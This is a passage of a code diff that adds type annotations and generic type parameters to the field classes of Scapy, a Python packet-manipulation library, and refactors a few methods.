@@ from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac from scapy.utils6 import in6_6to4ExtractAddr, in6_isaddr6to4, \ in6_isaddrTeredo, in6_ptop, Net6, teredoAddrExtractInfo -from scapy.base_classes import BasePacket, Gen, Net, Field_metaclass +from scapy.base_classes import BasePacket, Gen, Net, Field_metaclass, \ + Packet_metaclass from scapy.error import warning import scapy.modules.six as six from scapy.modules.six.moves import range from scapy.modules.six import integer_types +from scapy.compat import ( + Any, + AnyStr, + Callable, + Dict, + List, + Generic, + Optional, + Set, + Tuple, + TypeVar, + Union, + # func + cast, +) + """ Helper class to specify a protocol extendable for runtime modifications """ -class ObservableDict(dict): +class ObservableDict(Dict[int, str]): def __init__(self, *args, **kw): - self.observers = [] + # type: (*Dict[int, str], **Any) -> None + self.observers = [] # type: List[_EnumField[Any]] super(ObservableDict, self).__init__(*args, **kw) def observe(self, observer): + # type: (_EnumField[Any]) -> None self.observers.append(observer) def __setitem__(self, key, value): + # type: (int, str) -> None for o in self.observers: o.notify_set(self, key, value) super(ObservableDict, self).__setitem__(key, value) def __delitem__(self, key): + # type: (int) -> None for o in self.observers: o.notify_del(self, key) super(ObservableDict, self).__delitem__(key) - def update(self, anotherDict): + def update(self, anotherDict): # type: ignore for k in anotherDict: self[k] = anotherDict[k] @@ -74,7 +95,12 @@ def update(self, anotherDict): # Fields # ############ -class Field(six.with_metaclass(Field_metaclass, object)): +I = TypeVar('I') # Internal storage # noqa: E741 +M = TypeVar('M') # Machine storage + + +@six.add_metaclass(Field_metaclass) +class Field(Generic[I, M]): """ For more information on how this work, please refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf @@ -93,6 +119,7 @@ class Field(six.with_metaclass(Field_metaclass, object)): holds_packets = 0 def __init__(self, name, default, fmt="H"): + # type: (str, Any, str) -> None if not isinstance(name, str): raise ValueError("name should be a string") self.name = name @@ -102,50 +129,63 @@ def __init__(self, name, default, fmt="H"): self.fmt = "!" + fmt self.struct = struct.Struct(self.fmt) self.default = self.any2i(None, default) - self.sz = struct.calcsize(self.fmt) - self.owners = [] + self.sz = struct.calcsize(self.fmt) # type: int + self.owners = [] # type: List[Packet_metaclass] def register_owner(self, cls): + # type: (Packet_metaclass) -> None self.owners.append(cls) - def i2len(self, pkt, x): + def i2len(self, + pkt, # type: BasePacket + x, # type: Any + ): + # type: (...) -> int """Convert internal value to a length usable by a FieldLenField""" return self.sz def i2count(self, pkt, x): + # type: (Optional[BasePacket], I) -> int """Convert internal value to a number of elements usable by a FieldLenField. Always 1 except for list fields""" return 1 def h2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> I """Convert human value to internal value""" - return x + return cast(I, x) def i2h(self, pkt, x): + # type: (Optional[BasePacket], I) -> Any """Convert internal value to human value""" return x def m2i(self, pkt, x): + # type: (Optional[BasePacket], M) -> I """Convert machine value to internal value""" - return x + return cast(I, x) def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[I]) -> M """Convert internal value to machine value""" if x is None: - x = 0 + return cast(M, 0) elif isinstance(x, str): - return bytes_encode(x) - return x + return cast(M, bytes_encode(x)) + return cast(M, x) def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> Optional[I] """Try to understand the most input values possible and make an internal value from them""" # noqa: E501 return self.h2i(pkt, x) def i2repr(self, pkt, x): + # type: (Optional[BasePacket], I) -> str """Convert internal value to a nice representation""" return repr(self.i2h(pkt, x)) def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[I]) -> bytes """Add an internal value to a string Copy the network representation of field `val` (belonging to layer @@ -154,6 +194,7 @@ def addfield(self, pkt, s, val): return s + self.struct.pack(self.i2m(pkt, val)) def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, I] """Extract an internal value from a string Extract from the raw packet `s` the field value belonging to layer @@ -166,22 +207,26 @@ def getfield(self, pkt, s): return s[self.sz:], self.m2i(pkt, self.struct.unpack(s[:self.sz])[0]) def do_copy(self, x): + # type: (I) -> I if hasattr(x, "copy"): - return x.copy() + return x.copy() # type: ignore if isinstance(x, list): - x = x[:] + x = x[:] # type: ignore for i in range(len(x)): if isinstance(x[i], BasePacket): x[i] = x[i].copy() return x def __repr__(self): + # type: () -> str return "" % (",".join(x.__name__ for x in self.owners), self.name) # noqa: E501 def copy(self): + # type: () -> Field[I, M] return copy.copy(self) def randval(self): + # type: () -> VolatileValue """Return a volatile object whose value is both random and suitable for this field""" # noqa: E501 fmtt = self.fmt[-1] if fmtt in "BbHhIiQq": @@ -204,60 +249,76 @@ class Emph(object): __slots__ = ["fld"] def __init__(self, fld): + # type: (Any) -> None self.fld = fld def __getattr__(self, attr): + # type: (str) -> Any return getattr(self.fld, attr) def __eq__(self, other): - return self.fld == other + # type: (Any) -> bool + return bool(self.fld == other) def __ne__(self, other): + # type: (Any) -> bool # Python 2.7 compat return not self == other - __hash__ = None + # mypy doesn't support __hash__ = None + __hash__ = None # type: ignore class ActionField(object): __slots__ = ["_fld", "_action_method", "_privdata"] def __init__(self, fld, action_method, **kargs): + # type: (Field[Any, Any], str, **Any) -> None self._fld = fld self._action_method = action_method self._privdata = kargs def any2i(self, pkt, val): + # type: (Optional[BasePacket], int) -> Any getattr(pkt, self._action_method)(val, self._fld, **self._privdata) return getattr(self._fld, "any2i")(pkt, val) def __getattr__(self, attr): + # type: (str) -> Any return getattr(self._fld, attr) class ConditionalField(object): __slots__ = ["fld", "cond"] - def __init__(self, fld, cond): + def __init__(self, + fld, # type: Field[Any, Any] + cond # type: Callable[[Optional[BasePacket]], bool] + ): + # type: (...) -> None self.fld = fld self.cond = cond def _evalcond(self, pkt): - return self.cond(pkt) + # type: (BasePacket) -> bool + return bool(self.cond(pkt)) def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, Any] if self._evalcond(pkt): return self.fld.getfield(pkt, s) else: return s, None def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Any) -> bytes if self._evalcond(pkt): return self.fld.addfield(pkt, s, val) else: return s def __getattr__(self, attr): + # type: (str) -> Any return getattr(self.fld, attr) @@ -291,13 +352,18 @@ class MultipleTypeField(object): __slots__ = ["flds", "dflt", "name", "default"] - def __init__(self, flds, dflt): + def __init__(self, + flds, # type: List[Tuple[Field[Any, Any], Any]] + dflt # type: Field[Any, Any] + ): + # type: (...) -> None self.flds = flds self.dflt = dflt self.default = None # So that we can detect changes in defaults self.name = self.dflt.name def _iterate_fields_cond(self, pkt, val, use_val): + # type: (BasePacket, Any, bool) -> Field[Any, Any] """Internal function used by _find_fld_pkt & _find_fld_pkt_val""" # Iterate through the fields for fld, cond in self.flds: @@ -315,6 +381,7 @@ def _iterate_fields_cond(self, pkt, val, use_val): return self.dflt def _find_fld_pkt(self, pkt): + # type: (BasePacket) -> Field[Any, Any] """Given a Packet instance `pkt`, returns the Field subclass to be used. If you know the value to be set (e.g., in .addfield()), use ._find_fld_pkt_val() instead. @@ -322,7 +389,11 @@ def _find_fld_pkt(self, pkt): """ return self._iterate_fields_cond(pkt, None, False) - def _find_fld_pkt_val(self, pkt, val): + def _find_fld_pkt_val(self, + pkt, # type: BasePacket + val, # type: Any + ): + # type: (...) -> Tuple[Field[Any, Any], Any] """Given a Packet instance `pkt` and the value `val` to be set, returns the Field subclass to be used, and the updated `val` if necessary. @@ -333,6 +404,7 @@ def _find_fld_pkt_val(self, pkt, val): return fld, val def _find_fld(self): + # type: () -> Field[Any, Any] """Returns the Field subclass to be used, depending on the Packet instance, or the default subclass. @@ -346,7 +418,7 @@ def _find_fld(self): """ # Hack to preserve current Scapy API # See https://stackoverflow.com/a/7272464/3223422 - frame = inspect.currentframe().f_back.f_back + frame = inspect.currentframe().f_back.f_back # type: ignore while frame is not None: try: pkt = frame.f_locals['self'] @@ -361,43 +433,59 @@ def _find_fld(self): frame = frame.f_back return self.dflt - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, Any] return self._find_fld_pkt(pkt).getfield(pkt, s) def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Any) -> bytes fld, val = self._find_fld_pkt_val(pkt, val) return fld.addfield(pkt, s, val) def any2i(self, pkt, val): + # type: (BasePacket, Any) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.any2i(pkt, val) def h2i(self, pkt, val): + # type: (BasePacket, Any) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.h2i(pkt, val) - def i2h(self, pkt, val): + def i2h(self, + pkt, # type: BasePacket + val, # type: Any + ): + # type: (...) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2h(pkt, val) def i2m(self, pkt, val): + # type: (BasePacket, Optional[Any]) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2m(pkt, val) def i2len(self, pkt, val): + # type: (BasePacket, Any) -> int fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2len(pkt, val) def i2repr(self, pkt, val): + # type: (BasePacket, Any) -> str fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2repr(pkt, val) def register_owner(self, cls): + # type: (Packet_metaclass) -> None for fld, _ in self.flds: fld.owners.append(cls) self.dflt.owners.append(cls) def __getattr__(self, attr): + # type: (str) -> Any return getattr(self._find_fld(), attr) @@ -407,23 +495,40 @@ class PadField(object): __slots__ = ["_fld", "_align", "_padwith"] def __init__(self, fld, align, padwith=None): + # type: (Field[Any, Any], int, Optional[bytes]) -> None self._fld = fld self._align = align self._padwith = padwith or b"\x00" def padlen(self, flen): + # type: (int) -> int return -flen % self._align - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, Any] remain, val = self._fld.getfield(pkt, s) padlen = self.padlen(len(s) - len(remain)) return remain[padlen:], val - def addfield(self, pkt, s, val): + def addfield(self, + pkt, # type: BasePacket + s, # type: bytes + val, # type: Any + ): + # type: (...) -> bytes sval = self._fld.addfield(pkt, b"", val) - return s + sval + struct.pack("%is" % (self.padlen(len(sval))), self._padwith) # noqa: E501 + return s + sval + struct.pack( + "%is" % ( + self.padlen(len(sval)) + ), + self._padwith + ) def __getattr__(self, attr): + # type: (str) -> Any return getattr(self._fld, attr) @@ -431,114 +536,141 @@ class ReversePadField(PadField): """Add bytes BEFORE the proxified field so that it starts at the specified alignment from its beginning""" - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, Any] # We need to get the length that has already been dissected padlen = self.padlen(len(pkt.original) - len(s)) remain, val = self._fld.getfield(pkt, s[padlen:]) return remain, val - def addfield(self, pkt, s, val): + def addfield(self, + pkt, # type: BasePacket + s, # type: bytes + val, # type: Any + ): + # type: (...) -> bytes sval = self._fld.addfield(pkt, b"", val) - return s + struct.pack("%is" % (self.padlen(len(s))), self._padwith) + sval # noqa: E501 + return s + struct.pack("%is" % ( + self.padlen(len(s)) + ), self._padwith) + sval -class FCSField(Field): +class FCSField(Field[int, int]): """Special Field that gets its value from the end of the *packet* (Note: not layer, but packet). Mostly used for FCS """ + def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, int] previous_post_dissect = pkt.post_dissect val = self.m2i(pkt, struct.unpack(self.fmt, s[-self.sz:])[0]) def _post_dissect(self, s): + # type: (BasePacket, bytes) -> bytes # Reset packet to allow post_build self.raw_packet_cache = None self.post_dissect = previous_post_dissect - return previous_post_dissect(s) + return previous_post_dissect(s) # type: ignore pkt.post_dissect = MethodType(_post_dissect, pkt) return s[:-self.sz], val def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[int]) -> bytes previous_post_build = pkt.post_build value = struct.pack(self.fmt, self.i2m(pkt, val)) def _post_build(self, p, pay): + # type: (BasePacket, bytes, bytes) -> bytes pay += value self.post_build = previous_post_build - return previous_post_build(p, pay) + return previous_post_build(p, pay) # type: ignore pkt.post_build = MethodType(_post_build, pkt) return s def i2repr(self, pkt, x): - return lhex(self.i2h(pkt, x)) + # type: (BasePacket, int) -> str + return lhex(self.i2h(pkt, x)) # type: ignore -class DestField(Field): +class DestField(Field[str, bytes]): __slots__ = ["defaultdst"] # Each subclass must have its own bindings attribute - # bindings = {} + bindings = {} # type: Dict[Packet_metaclass, Tuple[str, Any]] def __init__(self, name, default): + # type: (str, str) -> None self.defaultdst = default def dst_from_pkt(self, pkt): + # type: (BasePacket) -> str for addr, condition in self.bindings.get(pkt.payload.__class__, []): try: if all(pkt.payload.getfieldval(field) == value for field, value in six.iteritems(condition)): - return addr + return addr # type: ignore except AttributeError: pass return self.defaultdst @classmethod def bind_addr(cls, layer, addr, **condition): - cls.bindings.setdefault(layer, []).append((addr, condition)) + # type: (Packet_metaclass, str, **Any) -> None + cls.bindings.setdefault(layer, []).append( # type: ignore + (addr, condition) + ) -class MACField(Field): +class MACField(Field[str, bytes]): def __init__(self, name, default): + # type: (str, Optional[Any]) -> None Field.__init__(self, name, default, "6s") def i2m(self, pkt, x): + # type: (BasePacket, Optional[str]) -> bytes if x is None: return b"\0\0\0\0\0\0" try: - x = mac2str(x) + y = mac2str(x) except (struct.error, OverflowError): - x = bytes_encode(x) - - return x + y = bytes_encode(x) + return y # type: ignore def m2i(self, pkt, x): - return str2mac(x) + # type: (Optional[BasePacket], bytes) -> str + return str2mac(x) # type: ignore def any2i(self, pkt, x): + # type: (BasePacket, Any) -> str if isinstance(x, bytes) and len(x) == 6: - x = self.m2i(pkt, x) - return x + return self.m2i(pkt, x) + return cast(str, x) def i2repr(self, pkt, x): + # type: (BasePacket, str) -> str x = self.i2h(pkt, x) if self in conf.resolve: x = conf.manufdb._resolve_MAC(x) return x def randval(self): + # type: () -> RandMAC return RandMAC() -class IPField(Field): - slots = [] - +class IPField(Field[str, bytes]): def __init__(self, name, default): + # type: (str, Optional[str]) -> None Field.__init__(self, name, default, "4s") def h2i(self, pkt, x): + # type: (BasePacket, Union[AnyStr, List[AnyStr]]) -> Any if isinstance(x, bytes): - x = plain_str(x) + x = plain_str(x) # type: ignore if isinstance(x, str): try: inet_aton(x) @@ -548,7 +680,12 @@ def h2i(self, pkt, x): x = [self.h2i(pkt, n) for n in x] return x + def i2h(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str + return cast(str, x) + def resolve(self, x): + # type: (str) -> str if self in conf.resolve: try: ret = socket.gethostbyaddr(x)[0] @@ -560,21 +697,26 @@ def resolve(self, x): return x def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> bytes if x is None: return b'\x00\x00\x00\x00' - return inet_aton(plain_str(x)) + return inet_aton(plain_str(x)) # type: ignore def m2i(self, pkt, x): - return inet_ntoa(x) + # type: (Optional[BasePacket], bytes) -> str + return inet_ntoa(x) # type: ignore def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> Any return self.h2i(pkt, x) def i2repr(self, pkt, x): + # type: (Optional[BasePacket], str) -> str r = self.resolve(self.i2h(pkt, x)) return r if isinstance(r, str) else repr(r) def randval(self): + # type: () -> RandIP return RandIP() @@ -582,38 +724,47 @@ class SourceIPField(IPField): __slots__ = ["dstname"] def __init__(self, name, dstname): + # type: (str, Optional[str]) -> None IPField.__init__(self, name, None) self.dstname = dstname def __findaddr(self, pkt): + # type: (BasePacket) -> str if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 dst = ("0.0.0.0" if self.dstname is None else getattr(pkt, self.dstname) or "0.0.0.0") if isinstance(dst, (Gen, list)): - r = {conf.route.route(str(daddr)) for daddr in dst} + r = { + conf.route.route(str(daddr)) # type: ignore + for daddr in dst + } # type: Set[Tuple[str, str, str]] if len(r) > 1: warning("More than one possible route for %r" % (dst,)) return min(r)[1] - return conf.route.route(dst)[1] + return conf.route.route(dst)[1] # type: ignore def i2m(self, pkt, x): + # type: (BasePacket, Optional[str]) -> bytes if x is None: x = self.__findaddr(pkt) - return IPField.i2m(self, pkt, x) + return super(SourceIPField, self).i2m(pkt, x) def i2h(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str if x is None: x = self.__findaddr(pkt) - return IPField.i2h(self, pkt, x) + return super(SourceIPField, self).i2h(pkt, x) -class IP6Field(Field): +class IP6Field(Field[Optional[str], bytes]): def __init__(self, name, default): + # type: (str, Optional[str]) -> None Field.__init__(self, name, default, "16s") def h2i(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str if isinstance(x, bytes): x = plain_str(x) if isinstance(x, str): @@ -623,20 +774,28 @@ def h2i(self, pkt, x): x = Net6(x) elif isinstance(x, list): x = [self.h2i(pkt, n) for n in x] - return x + return x # type: ignore + + def i2h(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str + return cast(str, x) def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> bytes if x is None: x = "::" - return inet_pton(socket.AF_INET6, plain_str(x)) + return inet_pton(socket.AF_INET6, plain_str(x)) # type: ignore def m2i(self, pkt, x): - return inet_ntop(socket.AF_INET6, x) + # type: (Optional[BasePacket], bytes) -> str + return inet_ntop(socket.AF_INET6, x) # type: ignore def any2i(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> str return self.h2i(pkt, x) def i2repr(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str if x is None: return self.i2h(pkt, x) elif not isinstance(x, Net6) and not isinstance(x, list): @@ -650,6 +809,7 @@ def i2repr(self, pkt, x): return r if isinstance(r, str) else repr(r) def randval(self): + # type: () -> RandIP6 return RandIP6() @@ -657,102 +817,125 @@ class SourceIP6Field(IP6Field): __slots__ = ["dstname"] def __init__(self, name, dstname): + # type: (str, str) -> None IP6Field.__init__(self, name, None) self.dstname = dstname def i2m(self, pkt, x): + # type: (BasePacket, Optional[str]) -> bytes if x is None: dst = ("::" if self.dstname is None else getattr(pkt, self.dstname) or "::") iff, x, nh = conf.route6.route(dst) - return IP6Field.i2m(self, pkt, x) + return super(SourceIP6Field, self).i2m(pkt, x) def i2h(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str if x is None: if conf.route6 is None: # unused import, only to initialize conf.route6 import scapy.route6 # noqa: F401 dst = ("::" if self.dstname is None else getattr(pkt, self.dstname)) # noqa: E501 if isinstance(dst, (Gen, list)): - r = {conf.route6.route(str(daddr)) for daddr in dst} + r = {conf.route6.route(str(daddr)) # type: ignore + for daddr in dst} if len(r) > 1: warning("More than one possible route for %r" % (dst,)) x = min(r)[1] else: x = conf.route6.route(dst)[1] - return IP6Field.i2h(self, pkt, x) + return super(SourceIP6Field, self).i2h(pkt, x) class DestIP6Field(IP6Field, DestField): - bindings = {} + bindings = {} # type: Dict[Packet_metaclass, Tuple[str, Any]] def __init__(self, name, default): + # type: (str, str) -> None IP6Field.__init__(self, name, None) DestField.__init__(self, name, default) def i2m(self, pkt, x): + # type: (BasePacket, Optional[str]) -> bytes if x is None: x = self.dst_from_pkt(pkt) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): + # type: (BasePacket, Optional[str]) -> str if x is None: x = self.dst_from_pkt(pkt) - return IP6Field.i2h(self, pkt, x) + return super(DestIP6Field, self).i2h(pkt, x) -class ByteField(Field): +class ByteField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "B") class XByteField(ByteField): def i2repr(self, pkt, x): - return lhex(self.i2h(pkt, x)) + # type: (Optional[BasePacket], int) -> str + return lhex(self.i2h(pkt, x)) # type: ignore +# XXX Unused field: at least add some tests class OByteField(ByteField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return "%03o" % self.i2h(pkt, x) class ThreeBytesField(ByteField): def __init__(self, name, default): - Field.__init__(self, name, default, "!I") + # type: (Optional[BasePacket], str, Optional[int]) -> None + Field.__init__(self, name, default, "!I") # type: ignore def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[int]) -> bytes return s + struct.pack(self.fmt, self.i2m(pkt, val))[1:4] def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, int] return s[3:], self.m2i(pkt, struct.unpack(self.fmt, b"\x00" + s[:3])[0]) # noqa: E501 class X3BytesField(ThreeBytesField, XByteField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return XByteField.i2repr(self, pkt, x) class LEThreeBytesField(ByteField): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, " bytes return s + struct.pack(self.fmt, self.i2m(pkt, val))[:3] def getfield(self, pkt, s): + # type: (Optional[BasePacket], bytes) -> Tuple[bytes, int] return s[3:], self.m2i(pkt, struct.unpack(self.fmt, s[:3] + b"\x00")[0]) # noqa: E501 class LEX3BytesField(LEThreeBytesField, XByteField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return XByteField.i2repr(self, pkt, x) -class NBytesField(ByteField, Field): +class NBytesField(Field[int, List[int]]): def __init__(self, name, default, sz): + # type: (str, Optional[int], int) -> None Field.__init__(self, name, default, "<" + "B" * sz) def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[int]) -> List[int] + if x is None: + return [] x2m = list() for _ in range(self.sz): x2m.append(x % 256) @@ -760,26 +943,33 @@ def i2m(self, pkt, x): return x2m[::-1] def m2i(self, pkt, x): + # type: (Optional[BasePacket], Union[List[int], int]) -> int if isinstance(x, int): return x # x can be a tuple when coming from struct.unpack (from getfield) if isinstance(x, (list, tuple)): return sum(d * (256 ** i) for i, d in enumerate(x)) + return 0 def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str if isinstance(x, integer_types): return '%i' % x return super(NBytesField, self).i2repr(pkt, x) def addfield(self, pkt, s, val): + # type: (Optional[BasePacket], bytes, Optional[int]) -> bytes return s + self.struct.pack(*self.i2m(pkt, val)) def getfield(self, pkt, s): - return s[self.sz:], self.m2i(pkt, self.struct.unpack(s[:self.sz])) + # type: (Optional[BasePacket], bytes) -> Tuple[bytes, int] + return (s[self.sz:], + self.m2i(pkt, self.struct.unpack(s[:self.sz]))) # type: ignore class XNBytesField(NBytesField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str if isinstance(x, integer_types): return '0x%x' % x # x can be a tuple when coming from struct.unpack (from getfield) @@ -788,8 +978,9 @@ def i2repr(self, pkt, x): return super(XNBytesField, self).i2repr(pkt, x) -class SignedByteField(Field): +class SignedByteField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "b") @@ -858,6 +1049,7 @@ class YesNoByteField(ByteField): __slots__ = ['eval_fn'] def _build_config_representation(self, config): + # type: (Dict[str, Any]) -> None assoc_table = dict() for key in config: value_spec = config[key] @@ -899,141 +1091,168 @@ def _build_config_representation(self, config): self.eval_fn = lambda x: assoc_table[x] if x in assoc_table else x - def __init__(self, name, default, config=None, *args, **kargs): + def __init__(self, name, default, config=None): + # type: (str, int, Optional[Dict[str, Any]]) -> None if not config: # this represents the common use case and therefore it is kept small # noqa: E501 self.eval_fn = lambda x: 'no' if x == 0 else 'yes' else: self._build_config_representation(config) - ByteField.__init__(self, name, default, *args, **kargs) + ByteField.__init__(self, name, default) def i2repr(self, pkt, x): - return self.eval_fn(x) + # type: (Optional[BasePacket], int) -> str + return self.eval_fn(x) # type: ignore -class ShortField(Field): +class ShortField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "H") -class SignedShortField(Field): +class SignedShortField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "h") -class LEShortField(Field): +class LEShortField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, " None Field.__init__(self, name, default, " str + return lhex(self.i2h(pkt, x)) # type: ignore -class IntField(Field): +class IntField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "I") -class SignedIntField(Field): +class SignedIntField(Field[int, int]): def __init__(self, name, default): + # type: (str, int) -> None Field.__init__(self, name, default, "i") -class LEIntField(Field): +class LEIntField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, " None Field.__init__(self, name, default, " str + return lhex(self.i2h(pkt, x)) # type: ignore class XLEIntField(LEIntField, XIntField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return XIntField.i2repr(self, pkt, x) class XLEShortField(LEShortField, XShortField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return XShortField.i2repr(self, pkt, x) -class LongField(Field): +class LongField(Field[int, int]): def __init__(self, name, default): + # type: (str, int) -> None Field.__init__(self, name, default, "Q") -class SignedLongField(Field): +class SignedLongField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "q") class LELongField(LongField): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, " None Field.__init__(self, name, default, " str + return lhex(self.i2h(pkt, x)) # type: ignore class XLELongField(LELongField, XLongField): def i2repr(self, pkt, x): + # type: (Optional[BasePacket], int) -> str return XLongField.i2repr(self, pkt, x) -class IEEEFloatField(Field): +class IEEEFloatField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "f") -class IEEEDoubleField(Field): +class IEEEDoubleField(Field[int, int]): def __init__(self, name, default): + # type: (str, Optional[int]) -> None Field.__init__(self, name, default, "d") -class StrField(Field): +class _StrField(Field[I, bytes]): __slots__ = ["remain"] def __init__(self, name, default, fmt="H", remain=0): + # type: (str, Optional[I], str, int) -> None Field.__init__(self, name, default, fmt) self.remain = remain def i2len(self, pkt, x): + # type: (Optional[BasePacket], Any) -> int return len(x) def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> I if isinstance(x, six.text_type): x = bytes_encode(x) - return super(StrField, self).any2i(pkt, x) + return super(_StrField, self).any2i(pkt, x) # type: ignore def i2repr(self, pkt, x): - val = super(StrField, self).i2repr(pkt, x) + # type: (Optional[BasePacket], I) -> str + val = super(_StrField, self).i2repr(pkt, x) if val[:2] in ['b"', "b'"]: return val[1:] return val def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[I]) -> bytes if x is None: return b"" if not isinstance(x, bytes): @@ -1041,51 +1260,80 @@ def i2m(self, pkt, x): return x def addfield(self, pkt, s, val): + # type: (Optional[BasePacket], bytes, Optional[I]) -> bytes return s + self.i2m(pkt, val) def getfield(self, pkt, s): + # type: (Optional[BasePacket], bytes) -> Tuple[bytes, I] if self.remain == 0: return b"", self.m2i(pkt, s) else: return s[-self.remain:], self.m2i(pkt, s[:-self.remain]) def randval(self): + # type: () -> RandBin return RandBin(RandNum(0, 1200)) +class StrField(_StrField[bytes]): + pass + + class StrFieldUtf16(StrField): def h2i(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> bytes return plain_str(x).encode('utf-16')[2:] def any2i(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> bytes if isinstance(x, six.text_type): return self.h2i(pkt, x) return super(StrFieldUtf16, self).any2i(pkt, x) def i2repr(self, pkt, x): - return x + # type: (Optional[BasePacket], bytes) -> str + return plain_str(x) def i2h(self, pkt, x): + # type: (Optional[BasePacket], bytes) -> str return bytes_encode(x).decode('utf-16') -class PacketField(StrField): +K = TypeVar('K', List[BasePacket], BasePacket) + + +class _PacketField(_StrField[K]): __slots__ = ["cls"] holds_packets = 1 - def __init__(self, name, default, cls, remain=0): - StrField.__init__(self, name, default, remain=remain) - self.cls = cls - - def i2m(self, pkt, i): + def __init__(self, + name, # type: str + default, # type: Optional[K] + pkt_cls, # type: Union[Callable[[bytes], BasePacket], Packet_metaclass] # noqa: E501 + remain=0, # type: int + ): + # type: (...) -> None + super(_PacketField, self).__init__(name, default, remain=remain) + self.cls = pkt_cls + + def i2m(self, + pkt, # type: BasePacket + i, # type: Any + ): + # type: (...) -> bytes if i is None: return b"" return raw(i) def m2i(self, pkt, m): + # type: (Optional[BasePacket], bytes) -> BasePacket return self.cls(m) - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, K] i = self.m2i(pkt, s) remain = b"" if conf.padding_layer in i: @@ -1095,18 +1343,33 @@ def getfield(self, pkt, s): return remain, i def randval(self): + # type: () -> K from scapy.packet import fuzz - return fuzz(self.cls()) + return fuzz(self.cls()) # type: ignore + + +class PacketField(_PacketField[BasePacket]): + pass class PacketLenField(PacketField): __slots__ = ["length_from"] - def __init__(self, name, default, cls, length_from=None): + def __init__(self, + name, # type: str + default, # type: BasePacket + cls, # type: Union[Callable[[bytes], BasePacket], Packet_metaclass] # noqa: E501 + length_from=None # type: Optional[Callable[[BasePacket], int]] # noqa: E501 + ): + # type: (...) -> None PacketField.__init__(self, name, default, cls) - self.length_from = length_from + self.length_from = length_from or (lambda x: 0) - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, BasePacket] len_pkt = self.length_from(pkt) try: i = self.m2i(pkt, s[:len_pkt]) @@ -1117,7 +1380,7 @@ def getfield(self, pkt, s): return s[len_pkt:], i -class PacketListField(PacketField): +class PacketListField(_PacketField[List[BasePacket]]): """PacketListField represents a series of Packet instances that might occur right in the middle of another Packet field list. This field type may also be used to indicate that a series of Packet @@ -1127,7 +1390,16 @@ class PacketListField(PacketField): __slots__ = ["count_from", "length_from", "next_cls_cb"] islist = 1 - def __init__(self, name, default, cls=None, count_from=None, length_from=None, next_cls_cb=None): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Optional[List[BasePacket]] + pkt_cls=None, # type: Optional[Union[Callable[[bytes], BasePacket], 